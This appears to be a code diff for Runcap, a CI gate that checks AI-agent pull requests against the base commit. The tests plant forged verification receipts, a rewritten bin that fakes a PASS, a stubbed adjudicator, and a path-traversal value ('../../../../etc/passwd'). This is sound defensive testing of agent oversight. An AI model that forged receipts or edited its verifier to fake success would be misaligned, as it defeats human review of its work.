|
116
|
+
check("honest fix recomputed replay_passed=true", honest.code_evidence?.replay_passed === true);
|
|
117
|
+
check("honest fix carries base policy hash", /^[0-9a-f]{64}$/.test(honest.policy?.hash ?? ""), honest.policy?.hash);
|
|
118
|
+
check("honest fix truth is adjudicator-recomputed", honest.truth === "recomputed_by_adjudicator_from_base_sha");
|
|
119
|
+
check("no telemetry present -> agent_telemetry.present false", honest.agent_telemetry?.present === false);
|
|
120
|
+
|
|
121
|
+
// --- 2. out-of-scope edit -> BLOCKED ----------------------------------------
|
|
122
|
+
const scope = await adj(BASE, HEAD_SCOPE);
|
|
123
|
+
check("out-of-scope edit verdict BLOCKED", scope.verdict === "BLOCKED", JSON.stringify(scope.reasons));
|
|
124
|
+
check("out-of-scope names the path + scope", scope.reasons.some((r) => r.includes("rootfile.txt") && r.toLowerCase().includes("scope")), JSON.stringify(scope.reasons));
|
|
125
|
+
|
|
126
|
+
// --- 3. baseline already green -> BLOCKED -----------------------------------
|
|
127
|
+
const green = await adj(BASE2, HEAD_BASE2GREEN);
|
|
128
|
+
check("baseline-already-green verdict BLOCKED", green.verdict === "BLOCKED", JSON.stringify(green.reasons));
|
|
129
|
+
check("baseline-already-green explains the meaningless pass", green.reasons.some((r) => r.toLowerCase().includes("baseline already green")), JSON.stringify(green.reasons));
|
|
130
|
+
|
|
131
|
+
// --- 4. clean replay does not reproduce the pass -> BLOCKED -----------------
|
|
132
|
+
const replayfail = await adj(BASE, HEAD_REPLAYFAIL);
|
|
133
|
+
check("clean-replay-fail verdict BLOCKED", replayfail.verdict === "BLOCKED", JSON.stringify(replayfail.reasons));
|
|
134
|
+
check("clean-replay-fail recomputed replay_passed=false", replayfail.code_evidence?.replay_passed === false);
|
|
135
|
+
check("clean-replay-fail says replay did not pass", replayfail.reasons.some((r) => r.toLowerCase().includes("replay did not pass")), JSON.stringify(replayfail.reasons));
|
|
136
|
+
|
|
137
|
+
// --- 5. verifier edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
|
|
138
|
+
const verifier = await adj(BASE, HEAD_VERIFIER);
|
|
139
|
+
check("verifier edit verdict HUMAN_APPROVAL_REQUIRED", verifier.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(verifier.reasons));
|
|
140
|
+
check("verifier edit names verify file as evidence", verifier.reasons.some((r) => r.includes("app/verify.mjs")), JSON.stringify(verifier.reasons));
|
|
141
|
+
|
|
142
|
+
// --- 6. policy edit -> HUMAN_APPROVAL_REQUIRED ------------------------------
|
|
143
|
+
const pol = await adj(BASE, HEAD_POLICY);
|
|
144
|
+
check("policy edit verdict HUMAN_APPROVAL_REQUIRED", pol.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(pol.reasons));
|
|
145
|
+
check("policy edit names the rules", pol.reasons.some((r) => r.toLowerCase().includes("rules")), JSON.stringify(pol.reasons));
|
|
146
|
+
|
|
147
|
+
// --- 7. workflow edit -> HUMAN_APPROVAL_REQUIRED ----------------------------
|
|
148
|
+
const wf = await adj(BASE, HEAD_WORKFLOW);
|
|
149
|
+
check("workflow edit verdict HUMAN_APPROVAL_REQUIRED", wf.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(wf.reasons));
|
|
150
|
+
|
|
151
|
+
// --- 8. dependency manifest edit -> HUMAN_APPROVAL_REQUIRED -----------------
|
|
152
|
+
const dep = await adj(BASE, HEAD_DEP);
|
|
153
|
+
check("dependency edit verdict HUMAN_APPROVAL_REQUIRED", dep.verdict === "HUMAN_APPROVAL_REQUIRED", JSON.stringify(dep.reasons));
|
|
154
|
+
check("dependency edit names manifest/lockfile", dep.reasons.some((r) => r.toLowerCase().includes("dependency")), JSON.stringify(dep.reasons));
|
|
155
|
+
|
|
156
|
+
// --- 9-11. diff smuggling -> BLOCKED ----------------------------------------
|
|
157
|
+
const del = await adj(BASE, HEAD_DELETE);
|
|
158
|
+
check("delete verdict BLOCKED", del.verdict === "BLOCKED", JSON.stringify(del.reasons));
|
|
159
|
+
check("delete reason names deletion", del.reasons.some((r) => r.toLowerCase().includes("delet")), JSON.stringify(del.reasons));
|
|
160
|
+
|
|
161
|
+
const bin = await adj(BASE, HEAD_BINARY);
|
|
162
|
+
check("binary file verdict BLOCKED", bin.verdict === "BLOCKED", JSON.stringify(bin.reasons));
|
|
163
|
+
check("binary reason names binary", bin.reasons.some((r) => r.toLowerCase().includes("binary")), JSON.stringify(bin.reasons));
|
|
164
|
+
|
|
165
|
+
const sym = await adj(BASE, HEAD_SYMLINK);
|
|
166
|
+
check("symlink verdict BLOCKED", sym.verdict === "BLOCKED", JSON.stringify(sym.reasons));
|
|
167
|
+
check("symlink reason names symlink", sym.reasons.some((r) => r.toLowerCase().includes("symlink")), JSON.stringify(sym.reasons));
|
|
168
|
+
|
|
169
|
+
// --- 12. unresolved SHA -> BLOCKED (no flags, no event) ---------------------
|
|
170
|
+
const prevEventPath = process.env.GITHUB_EVENT_PATH;
|
|
171
|
+
const prevEventName = process.env.GITHUB_EVENT_NAME;
|
|
172
|
+
delete process.env.GITHUB_EVENT_PATH;
|
|
173
|
+
delete process.env.GITHUB_EVENT_NAME;
|
|
174
|
+
const unresolved = await adjudicate({ cwd: tmp });
|
|
175
|
+
check("unresolved base/head verdict BLOCKED", unresolved.verdict === "BLOCKED", JSON.stringify(unresolved.reasons));
|
|
176
|
+
check("unresolved refuses to adjudicate", unresolved.reasons.some((r) => r.toLowerCase().includes("refusing to adjudicate")), JSON.stringify(unresolved.reasons));
|
|
177
|
+
|
|
178
|
+
// --- 13. untrusted event (pull_request_target) -> BLOCKED -------------------
|
|
179
|
+
const eventFile = path.join(tmp, "event.json");
|
|
180
|
+
writeFileSync(eventFile, JSON.stringify({ pull_request: { base: { sha: BASE }, head: { sha: HEAD_HONEST } } }));
|
|
181
|
+
process.env.GITHUB_EVENT_PATH = eventFile;
|
|
182
|
+
process.env.GITHUB_EVENT_NAME = "pull_request_target";
|
|
183
|
+
const untrusted = await adjudicate({ cwd: tmp });
|
|
184
|
+
check("pull_request_target event verdict BLOCKED", untrusted.verdict === "BLOCKED", JSON.stringify(untrusted.reasons));
|
|
185
|
+
check("untrusted event names the rejected event", untrusted.sha_source?.startsWith("untrusted_event"), untrusted.sha_source);
|
|
186
|
+
// Restore env.
|
|
187
|
+
if (prevEventPath === undefined) delete process.env.GITHUB_EVENT_PATH; else process.env.GITHUB_EVENT_PATH = prevEventPath;
|
|
188
|
+
if (prevEventName === undefined) delete process.env.GITHUB_EVENT_NAME; else process.env.GITHUB_EVENT_NAME = prevEventName;
|
|
189
|
+
|
|
190
|
+
// --- 14. forged "VERIFIED_STRONG" receipt cannot rescue a failing replay -----
|
|
191
|
+
// The required gate now refuses to even READ the agent receipt: it is neither
|
|
192
|
+
// graded nor displayed. So a forged receipt can neither rescue a failing replay
|
|
193
|
+
// nor is it parsed at all. We plant adversarial receipts and prove the verdict
|
|
194
|
+
// is unchanged AND the gate reports it never consulted them.
|
|
195
|
+
const plantReceipt = (rawString) => {
|
|
196
|
+
const id = "forged";
|
|
197
|
+
mkdirSync(path.join(tmp, ".runcap", "outcomes", id), { recursive: true });
|
|
198
|
+
writeFileSync(path.join(tmp, ".runcap", "outcomes", id, "receipt.json"), rawString);
|
|
199
|
+
writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), id);
|
|
200
|
+
};
|
|
201
|
+
const clearReceipt = () => rmSync(path.join(tmp, ".runcap", "outcomes"), { recursive: true, force: true });
|
|
202
|
+
|
|
203
|
+
plantReceipt(JSON.stringify({ outcome: "VERIFIED", verificationIntegrity: { status: "VERIFIED_STRONG" }, cost: { actualCostUsd: 0.01 } }));
|
|
204
|
+
const forgedFail = await adj(BASE, HEAD_REPLAYFAIL);
|
|
205
|
+
check("forged VERIFIED_STRONG receipt does NOT rescue a failing replay", forgedFail.verdict === "BLOCKED", JSON.stringify(forgedFail.reasons));
|
|
206
|
+
check("required gate did not read the agent receipt (present=false)", forgedFail.agent_telemetry?.present === false && forgedFail.agent_telemetry?.influence_on_verdict === "none");
|
|
207
|
+
clearReceipt();
|
|
208
|
+
|
|
209
|
+
// --- 15. forged budget telemetry cannot block an honest pass ----------------
|
|
210
|
+
plantReceipt(JSON.stringify({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } }));
|
|
211
|
+
const forgedBudget = await adj(BASE, HEAD_HONEST);
|
|
212
|
+
check("forged budget/integrity telemetry cannot block an honest pass", forgedBudget.verdict === "PASS", JSON.stringify(forgedBudget.reasons));
|
|
213
|
+
check("required gate still did not read the receipt (present=false)", forgedBudget.agent_telemetry?.present === false && forgedBudget.agent_telemetry?.influence_on_verdict === "none");
|
|
214
|
+
clearReceipt();
|
|
215
|
+
|
|
216
|
+
// --- 15b. adversarial receipts cannot crash or stall the mandatory gate ------
|
|
217
|
+
// Malformed JSON, an enormous blob, and a path-traversal "latest" pointer must
|
|
218
|
+
// all be inert: the gate must still return a verdict with present=false.
|
|
219
|
+
for (const [label, rawReceipt, latestOverride] of [
|
|
220
|
+
["malformed JSON receipt", "{ this is : not json ]]]", undefined],
|
|
221
|
+
["enormous receipt blob", JSON.stringify({ outcome: "VERIFIED", junk: "A".repeat(5_000_000) }), undefined],
|
|
222
|
+
["receipt is a bare array", "[1,2,3]", undefined],
|
|
223
|
+
["latest pointer path traversal", JSON.stringify({ outcome: "VERIFIED" }), "../../../../etc/passwd"]
|
|
224
|
+
]) {
|
|
225
|
+
plantReceipt(rawReceipt);
|
|
226
|
+
if (latestOverride !== undefined) writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), latestOverride);
|
|
227
|
+
let crashed = false; let v;
|
|
228
|
+
try { v = await adj(BASE, HEAD_HONEST); } catch { crashed = true; }
|
|
229
|
+
check(`${label}: gate does not crash`, !crashed);
|
|
230
|
+
check(`${label}: verdict still PASS, receipt not read`, !crashed && v.verdict === "PASS" && v.agent_telemetry?.present === false);
|
|
231
|
+
clearReceipt();
|
|
232
|
+
}
|
|
233
|
+
|
|
234
|
+
// --- 16. honesty: the verdict never claims runtime hardening attestation -----
|
|
235
|
+
check("verdict carries honest hardening provenance (documented, not attested)",
|
|
236
|
+
honest.repository_hardening?.required_profile === "documented" &&
|
|
237
|
+
honest.repository_hardening?.runtime_attestation === "not_performed_in_pr_job");
|
|
238
|
+
const allVerdictText = JSON.stringify([honest, scope, verifier, untrusted]);
|
|
239
|
+
check("no verdict ever claims a HARDENED runtime status", !/"HARDENED"|hardened_confirmed|attested_hardened/.test(allVerdictText));
|
|
240
|
+
|
|
241
|
+
// --- 17. honesty: dependency install is base-pinned and script-free ----------
|
|
242
|
+
const adjSrc = readFileSync(path.join(SRC_DIR, "adjudicate.mjs"), "utf8");
|
|
243
|
+
check("replay uses `npm ci --ignore-scripts` (no install, no lifecycle scripts)", adjSrc.includes("npm ci --ignore-scripts"));
|
|
244
|
+
check("adjudicator never uses `npm install` or `npx`", !/npm install|npx /.test(adjSrc));
|
|
245
|
+
|
|
246
|
+
// --- 18. the real bin: exit codes a PR check sees ---------------------------
|
|
247
|
+
const runBin = (extraArgs, extraEnv = {}) => {
|
|
248
|
+
try {
|
|
249
|
+
const stdout = execFileSync("node", [BIN, "ci", "--mode", "adjudicate", ...extraArgs], { cwd: tmp, env: { ...process.env, ...extraEnv }, stdio: ["ignore", "pipe", "pipe"] });
|
|
250
|
+
return { code: 0, stdout: String(stdout) };
|
|
251
|
+
} catch (e) {
|
|
252
|
+
return { code: e.status ?? 1, stdout: String(e.stdout ?? ""), stderr: String(e.stderr ?? "") };
|
|
253
|
+
}
|
|
254
|
+
};
|
|
255
|
+
|
|
256
|
+
const binPass = runBin(["--base", BASE, "--head", HEAD_HONEST]);
|
|
257
|
+
check("`runcap ci --mode adjudicate` exits 0 on PASS", binPass.code === 0, `code=${binPass.code}`);
|
|
258
|
+
check("PASS run prints the verdict", /Verdict:\s+PASS/.test(binPass.stdout), binPass.stdout.slice(-300));
|
|
259
|
+
|
|
260
|
+
const binBlock = runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL]);
|
|
261
|
+
check("`runcap ci --mode adjudicate` exits 1 on BLOCKED", binBlock.code === 1, `code=${binBlock.code}`);
|
|
262
|
+
|
|
263
|
+
const binHuman = runBin(["--base", BASE, "--head", HEAD_VERIFIER]);
|
|
264
|
+
check("`runcap ci --mode adjudicate` exits 0 on HUMAN_APPROVAL_REQUIRED (success/neutral)", binHuman.code === 0, `code=${binHuman.code}`);
|
|
265
|
+
check("HUMAN run prints the human-gate verdict", /Verdict:\s+HUMAN_APPROVAL_REQUIRED/.test(binHuman.stdout), binHuman.stdout.slice(-300));
|
|
266
|
+
|
|
267
|
+
// --- 19. the real bin writes a PR step summary ------------------------------
|
|
268
|
+
const summaryFile = path.join(tmp, "step-summary.md");
|
|
269
|
+
writeFileSync(summaryFile, "");
|
|
270
|
+
runBin(["--base", BASE, "--head", HEAD_REPLAYFAIL], { GITHUB_STEP_SUMMARY: summaryFile });
|
|
271
|
+
const summary = readFileSync(summaryFile, "utf8");
|
|
272
|
+
check("bin writes a PR summary to GITHUB_STEP_SUMMARY", /Runcap CI adjudication: BLOCKED/.test(summary), summary.slice(0, 160));
|
|
273
|
+
|
|
274
|
+
// --- 20. exitCodeFor maps the three states correctly ------------------------
|
|
275
|
+
check("exitCodeFor PASS=0 / HUMAN=0 / BLOCKED=1",
|
|
276
|
+
exitCodeFor("PASS") === 0 && exitCodeFor("HUMAN_APPROVAL_REQUIRED") === 0 && exitCodeFor("BLOCKED") === 1);
|
|
277
|
+
|
|
278
|
+
// --- 21. the reference workflow is least-privilege AND a proof gate ----------
|
|
279
|
+
// The consumer reference is a TEMPLATE under examples/ (not an active workflow
|
|
280
|
+
// in this repo), because Runcap's own repo has no base policy to self-adjudicate
|
|
281
|
+
// and, more importantly, the judge must never be code from the candidate PR.
|
|
282
|
+
const wfPath = path.join(REPO_ROOT, "examples", "runcap-adjudicate.yml");
|
|
283
|
+
const wfRaw = readFileSync(wfPath, "utf8");
|
|
284
|
+
// Assert on the effective YAML directives, not the explanatory comments. The
|
|
285
|
+
// header documents what the workflow must NOT do (and so legitimately contains
|
|
286
|
+
// strings like "pull_request_target"); strip comments so the safety checks see
|
|
287
|
+
// only the real instructions. Inline `# v4.3.1` after a SHA is stripped too,
|
|
288
|
+
// which is harmless because the SHA precedes the `#`.
|
|
289
|
+
const wfText = wfRaw.split("\n").map((line) => line.replace(/#.*$/, "")).join("\n");
|
|
290
|
+
check("reference workflow triggers on pull_request (not pull_request_target)",
|
|
291
|
+
/on:\s*\n\s*pull_request:/.test(wfText) && !/pull_request_target/.test(wfText), "trigger");
|
|
292
|
+
check("reference workflow grants only contents: read", /permissions:\s*\n\s*contents:\s*read/.test(wfText) && !/id-token/.test(wfText) && !/write/.test(wfText.replace(/contents:\s*read/g, "")), "permissions");
|
|
293
|
+
check("reference workflow caps runtime (timeout-minutes: 10)", /timeout-minutes:\s*10/.test(wfText));
|
|
294
|
+
check("reference workflow uses no `needs:` (self-sufficient required gate)", !/\n\s*needs:/.test(wfText));
|
|
295
|
+
|
|
296
|
+
// Proof-gate hardening: the judge must NOT be PR-workspace code.
|
|
297
|
+
check("reference workflow never executes PR-workspace `node ./bin/runcap.mjs`", !/node\s+\.\/bin\/runcap\.mjs/.test(wfText), "executes workspace code");
|
|
298
|
+
check("reference workflow never uses a local action (`uses: ./`)", !/uses:\s*\.\//.test(wfText), "local action");
|
|
299
|
+
check("reference workflow never runs `npm ci`/`npm install` of the PR manifest", !/npm\s+(ci|install)/.test(wfText), "PR-workspace install");
|
|
300
|
+
check("reference workflow sets persist-credentials: false (never true)", /persist-credentials:\s*false/.test(wfText) && !/persist-credentials:\s*true/.test(wfText), "persist-credentials");
|
|
301
|
+
// Every `uses:` must be pinned to a full 40-hex commit SHA, never a floating tag.
|
|
302
|
+
const usesRefs = [...wfText.matchAll(/uses:\s*([^\s#]+)/g)].map((m) => m[1]);
|
|
303
|
+
check("reference workflow pins every action by a full 40-char commit SHA (no @v4/@v1 tags)",
|
|
304
|
+
usesRefs.length > 0 && usesRefs.every((u) => /@[0-9a-f]{40}$/.test(u)), JSON.stringify(usesRefs));
|
|
305
|
+
check("reference workflow's judge is the released Runcap action, not workspace code",
|
|
306
|
+
/uses:\s*kirder24-code\/ai-agent-manager@[0-9a-f]{40}/.test(wfText) && /mode:\s*adjudicate/.test(wfText), "released action judge");
|
|
307
|
+
|
|
308
|
+
// --- 22. the judge is the adjudicator's OWN code, not the PR's bin -----------
|
|
309
|
+
// A head PR that rewrites bin/runcap.mjs to always print PASS, or rewrites
|
|
310
|
+
// src/adjudicate.mjs, cannot change the verdict, because the adjudicator we run
|
|
311
|
+
// is THIS repo's module/bin (the released-action analogue), never the head copy.
|
|
312
|
+
const HEAD_FAKE_BIN = makeHead("h-fake-bin", () => {
|
|
313
|
+
w("app/broken.mjs", "export const ok = false; // still broken\n");
|
|
314
|
+
mkdirSync(path.join(tmp, "bin"), { recursive: true });
|
|
315
|
+
w("bin/runcap.mjs", "#!/usr/bin/env node\nconsole.log('Verdict: PASS'); process.exit(0);\n");
|
|
316
|
+
});
|
|
317
|
+
const fakeBin = await adj(BASE, HEAD_FAKE_BIN);
|
|
318
|
+
check("head PR rewriting bin/runcap.mjs to fake PASS is still BLOCKED by the trusted adjudicator",
|
|
319
|
+
fakeBin.verdict === "BLOCKED", JSON.stringify(fakeBin.reasons));
|
|
320
|
+
// And via the REAL trusted bin (this repo's, analogue of the pinned released action):
|
|
321
|
+
const fakeBinReal = runBin(["--base", BASE, "--head", HEAD_FAKE_BIN]);
|
|
322
|
+
check("trusted `runcap ci --mode adjudicate` exits 1 on a fake-PASS head bin", fakeBinReal.code === 1, `code=${fakeBinReal.code}`);
|
|
323
|
+
|
|
324
|
+
const HEAD_FAKE_ADJ = makeHead("h-fake-adj", () => {
|
|
325
|
+
w("app/broken.mjs", "export const ok = false; // still broken\n");
|
|
326
|
+
mkdirSync(path.join(tmp, "src"), { recursive: true });
|
|
327
|
+
w("src/adjudicate.mjs", "export async function adjudicate(){return {verdict:'PASS',reasons:[]};}\nexport function exitCodeFor(){return 0;}\nexport function formatAdjudication(){return ['Verdict: PASS'];}\n");
|
|
328
|
+
});
|
|
329
|
+
const fakeAdj = await adj(BASE, HEAD_FAKE_ADJ);
|
|
330
|
+
check("head PR rewriting src/adjudicate.mjs is still BLOCKED (we never import the head copy)",
|
|
331
|
+
fakeAdj.verdict === "BLOCKED", JSON.stringify(fakeAdj.reasons));
|
|
332
|
+
|
|
333
|
+
console.log("\n" + (failures === 0 ? "ALL ADJUDICATE TESTS PASSED" : `${failures} ADJUDICATE TEST(S) FAILED`));
|
|
334
|
+
process.exit(failures === 0 ? 0 : 1);
|
|
@@ -0,0 +1,508 @@
|
|
|
1
|
+
// Tier 3: the independent CI adjudicator (`runcap ci --mode adjudicate`).
|
|
2
|
+
//
|
|
3
|
+
// `runcap ci` (Tier 2) recomputes the PASS/BLOCKED *logic* from the policy, but
|
|
4
|
+
// it grades the integrity *facts* that the agent wrote into receipt.json. A
|
|
5
|
+
// forged "VERIFIED_STRONG" receipt therefore grades PASS. This module closes
|
|
6
|
+
// that gap: it recomputes the facts itself, in CI, from the BASE commit of the
|
|
7
|
+
// pull request - the last state a human reviewer approved - and never trusts a
|
|
8
|
+
// number the agent stamped on its own receipt.
|
|
9
|
+
//
|
|
10
|
+
// What it trusts: the base/head SHAs from the trusted `pull_request` event, and
|
|
11
|
+
// the policy + verifier + lockfile read from the BASE commit.
|
|
12
|
+
// What it does NOT trust: receipt.json, gateway telemetry, artifact-reported
|
|
13
|
+
// SHAs, the head-side policy/verifier/workflow, or any agent
|
|
14
|
+
// environment value. Agent telemetry is carried as advisory
|
|
15
|
+
// only and can never move the verdict.
|
|
16
|
+
//
|
|
17
|
+
// Three verdicts:
|
|
18
|
+
// PASS - every changed path is an in-scope regular text
|
|
19
|
+
// edit, the task genuinely failed at base, and the
|
|
20
|
+
// change makes the base-pinned verifier pass in a
|
|
21
|
+
// clean base checkout.
|
|
22
|
+
// BLOCKED - any structurally unsafe change (delete/rename/
|
|
23
|
+
// symlink/submodule/mode/binary/LFS), an out-of-
|
|
24
|
+
// scope edit, a meaningless baseline, or a replay
|
|
25
|
+
// that does not reproduce the pass.
|
|
26
|
+
// HUMAN_APPROVAL_REQUIRED - the change touches the rules or the evidence
|
|
27
|
+
// themselves (policy, workflow, verifier, protected
|
|
28
|
+
// or dependency files). Runcap declines to issue an
|
|
29
|
+
// automated proof; a human CODEOWNER must decide.
|
|
30
|
+
//
|
|
31
|
+
// This module imports only node builtins + js-yaml + validatePolicy/policyMeta
|
|
32
|
+
// from policy.mjs (one direction, no cycle). It never imports mission-control.
|
|
33
|
+
|
|
34
|
+
import { spawn } from "node:child_process";
|
|
35
|
+
import { createHash } from "node:crypto";
|
|
36
|
+
import { mkdir, writeFile, readFile, rm } from "node:fs/promises";
|
|
37
|
+
import { existsSync, readFileSync } from "node:fs";
|
|
38
|
+
import path from "node:path";
|
|
39
|
+
import os from "node:os";
|
|
40
|
+
import yaml from "js-yaml";
|
|
41
|
+
import { validatePolicy, policyMeta } from "./policy.mjs";
|
|
42
|
+
|
|
43
|
+
const POLICY_FILENAMES = ["mission.yaml", "mission.yml", "mission.json"];
|
|
44
|
+
|
|
45
|
+
// Paths that are the rules or the evidence themselves. An edit to any of these
|
|
46
|
+
// is never auto-approved: a human CODEOWNER must sign off, because changing the
|
|
47
|
+
// verifier, the policy, or the workflow changes what "passing" even means.
|
|
48
|
+
const DEPENDENCY_FILES = [
|
|
49
|
+
"package.json", "package-lock.json", "npm-shrinkwrap.json",
|
|
50
|
+
"yarn.lock", "pnpm-lock.yaml", "bun.lockb"
|
|
51
|
+
];
|
|
52
|
+
|
|
53
|
+
// The same protected globs the in-terminal guard uses (tests/config), so the
|
|
54
|
+
// adjudicator and the local guard agree on what counts as evidence.
|
|
55
|
+
const PROTECTED_GLOBS = [
|
|
56
|
+
/(^|\/)[^/]*\.test\.[mc]?[jt]sx?$/,
|
|
57
|
+
/(^|\/)[^/]*\.spec\.[mc]?[jt]sx?$/,
|
|
58
|
+
/(^|\/)__tests__\//,
|
|
59
|
+
/(^|\/)tests?\//,
|
|
60
|
+
/(^|\/)package\.json$/,
|
|
61
|
+
/(^|\/)tsconfig[^/]*\.json$/,
|
|
62
|
+
/(^|\/)jest\.config\./,
|
|
63
|
+
/(^|\/)vitest\.config\./
|
|
64
|
+
];
|
|
65
|
+
|
|
66
|
+
const LFS_POINTER_SIGNATURE = "version https://git-lfs.github.com/spec";
|
|
67
|
+
|
|
68
|
+
// --- git plumbing (local, spawn-based; no influence from agent env) ---------
|
|
69
|
+
|
|
70
|
+
function git(args, cwd) {
|
|
71
|
+
return new Promise((resolve) => {
|
|
72
|
+
const child = spawn("git", args, { cwd, shell: false });
|
|
73
|
+
let stdout = "";
|
|
74
|
+
let stderr = "";
|
|
75
|
+
child.stdout.on("data", (c) => { stdout += c.toString(); });
|
|
76
|
+
child.stderr.on("data", (c) => { stderr += c.toString(); });
|
|
77
|
+
child.on("error", (e) => resolve({ text: "", error: e.message }));
|
|
78
|
+
child.on("close", (code) => resolve({ text: stdout, error: code === 0 ? null : stderr.trim() }));
|
|
79
|
+
});
|
|
80
|
+
}
|
|
81
|
+
|
|
82
|
+
// Exact bytes of a blob at a commit. Unlike git(), this never trims, so applied
|
|
83
|
+
// file content is byte-identical to what is in the head tree.
|
|
84
|
+
function gitShowBytes(rev, relPath, cwd) {
|
|
85
|
+
return new Promise((resolve) => {
|
|
86
|
+
const child = spawn("git", ["show", `${rev}:${relPath}`], { cwd, shell: false });
|
|
87
|
+
const chunks = [];
|
|
88
|
+
let stderr = "";
|
|
89
|
+
child.stdout.on("data", (c) => chunks.push(c));
|
|
90
|
+
child.stderr.on("data", (c) => { stderr += c.toString(); });
|
|
91
|
+
child.on("error", (e) => resolve({ ok: false, buffer: null, error: e.message }));
|
|
92
|
+
child.on("close", (code) => resolve(code === 0 ? { ok: true, buffer: Buffer.concat(chunks), error: null } : { ok: false, buffer: null, error: stderr.trim() }));
|
|
93
|
+
});
|
|
94
|
+
}
|
|
95
|
+
|
|
96
|
+
async function revExists(rev, cwd) {
|
|
97
|
+
const r = await git(["cat-file", "-e", `${rev}^{commit}`], cwd);
|
|
98
|
+
return r.error === null;
|
|
99
|
+
}
|
|
100
|
+
|
|
101
|
+
async function blobExists(rev, relPath, cwd) {
|
|
102
|
+
const r = await git(["cat-file", "-e", `${rev}:${relPath}`], cwd);
|
|
103
|
+
return r.error === null;
|
|
104
|
+
}
|
|
105
|
+
|
|
106
|
+
// Run the base-pinned verify command in a directory. Mirrors mission-control's
|
|
107
|
+
// runShell so a verifier behaves identically here and in the terminal guard.
|
|
108
|
+
function runShell(commandString, cwd) {
|
|
109
|
+
const started = Date.now();
|
|
110
|
+
const shell = process.platform === "win32" ? "cmd" : "sh";
|
|
111
|
+
const shellArgs = process.platform === "win32" ? ["/c", commandString] : ["-c", commandString];
|
|
112
|
+
return new Promise((resolve) => {
|
|
113
|
+
const child = spawn(shell, shellArgs, { cwd, env: { ...process.env, AIM_WRAPPED: "1" }, shell: false });
|
|
114
|
+
let stdout = "";
|
|
115
|
+
let stderr = "";
|
|
116
|
+
child.stdout?.on("data", (c) => { const t = c.toString(); stdout += t; });
|
|
117
|
+
child.stderr?.on("data", (c) => { const t = c.toString(); stderr += t; });
|
|
118
|
+
child.on("error", (e) => resolve({ stdout, stderr: stderr + `\n${e.message}`, exitCode: 127, durationMs: Date.now() - started }));
|
|
119
|
+
child.on("close", (code) => resolve({ stdout, stderr, exitCode: code ?? 1, durationMs: Date.now() - started }));
|
|
120
|
+
});
|
|
121
|
+
}
|
|
122
|
+
|
|
123
|
+
// --- SHA resolution (trusted PR event ONLY) ---------------------------------
|
|
124
|
+
|
|
125
|
+
// The ONLY trusted source of base/head is the `pull_request` event payload that
|
|
126
|
+
// GitHub itself writes to $GITHUB_EVENT_PATH. We never read a SHA from the
|
|
127
|
+
// receipt, an artifact, or any agent-controlled value. Explicit flags exist for
|
|
128
|
+
// local runs and tests; on a real PR job the event payload wins.
|
|
129
|
+
function resolveShas({ baseFlag, headFlag } = {}) {
|
|
130
|
+
if (baseFlag && headFlag) {
|
|
131
|
+
return { baseSha: baseFlag, headSha: headFlag, shaSource: "explicit_flags" };
|
|
132
|
+
}
|
|
133
|
+
const eventPath = process.env.GITHUB_EVENT_PATH;
|
|
134
|
+
const eventName = process.env.GITHUB_EVENT_NAME;
|
|
135
|
+
if (eventPath && existsSync(eventPath)) {
|
|
136
|
+
try {
|
|
137
|
+
const event = JSON.parse(readFileSync(eventPath, "utf8"));
|
|
138
|
+
const base = event?.pull_request?.base?.sha;
|
|
139
|
+
const head = event?.pull_request?.head?.sha;
|
|
140
|
+
if (base && head) {
|
|
141
|
+
// pull_request_target would run with base-repo secrets against head code.
|
|
142
|
+
// We only adjudicate the read-only `pull_request` event.
|
|
143
|
+
const trusted = eventName === "pull_request" || eventName === undefined;
|
|
144
|
+
return { baseSha: base, headSha: head, shaSource: trusted ? "github_pull_request_event" : `untrusted_event:${eventName}` };
|
|
145
|
+
}
|
|
146
|
+
} catch { /* fall through to unresolved */ }
|
|
147
|
+
}
|
|
148
|
+
return { baseSha: null, headSha: null, shaSource: "unresolved" };
|
|
149
|
+
}
|
|
150
|
+
|
|
151
|
+
// --- policy loaded FROM THE BASE COMMIT -------------------------------------
|
|
152
|
+
|
|
153
|
+
// Read and parse the policy as it exists at the base commit - the rules the
|
|
154
|
+
// reviewer last approved - not the head-side policy the PR could have rewritten.
|
|
155
|
+
async function loadPolicyFromBase(baseSha, explicitPath, cwd) {
|
|
156
|
+
const candidates = explicitPath ? [explicitPath] : POLICY_FILENAMES.map((n) => path.posix.join(".runcap", n));
|
|
157
|
+
for (const rel of candidates) {
|
|
158
|
+
if (!(await blobExists(baseSha, rel, cwd))) continue;
|
|
159
|
+
const got = await gitShowBytes(baseSha, rel, cwd);
|
|
160
|
+
if (!got.ok) continue;
|
|
161
|
+
const raw = got.buffer.toString("utf8");
|
|
162
|
+
let policy;
|
|
163
|
+
try {
|
|
164
|
+
policy = rel.endsWith(".json") ? JSON.parse(raw) : yaml.load(raw);
|
|
165
|
+
} catch (e) {
|
|
166
|
+
return { error: `policy at base:${rel} did not parse: ${e.message}` };
|
|
167
|
+
}
|
|
168
|
+
if (!policy || typeof policy !== "object") return { error: `policy at base:${rel} is not an object.` };
|
|
169
|
+
return {
|
|
170
|
+
result: { policy, raw, hash: createHash("sha256").update(raw).digest("hex"), source: rel }
|
|
171
|
+
};
|
|
172
|
+
}
|
|
173
|
+
return { error: "no policy (.runcap/mission.{yaml,yml,json}) found at the base commit." };
|
|
174
|
+
}
|
|
175
|
+
|
|
176
|
+
// --- diff classification ----------------------------------------------------
|
|
177
|
+
|
|
178
|
+
function isProtectedPath(relPath, extraProtected) {
|
|
179
|
+
if (extraProtected.some((p) => relPath === p || relPath.startsWith(p.replace(/\/?$/, "/")))) return true;
|
|
180
|
+
return PROTECTED_GLOBS.some((re) => re.test(relPath));
|
|
181
|
+
}
|
|
182
|
+
|
|
183
|
+
function withinAllowed(relPath, allowed) {
|
|
184
|
+
if (!allowed || allowed.length === 0) return true;
|
|
185
|
+
return allowed.some((a) => relPath === a || relPath.startsWith(a.replace(/\/?$/, "/")));
|
|
186
|
+
}
|
|
187
|
+
|
|
188
|
+
function isWorkflowPath(relPath) {
|
|
189
|
+
return relPath.startsWith(".github/workflows/");
|
|
190
|
+
}
|
|
191
|
+
|
|
192
|
+
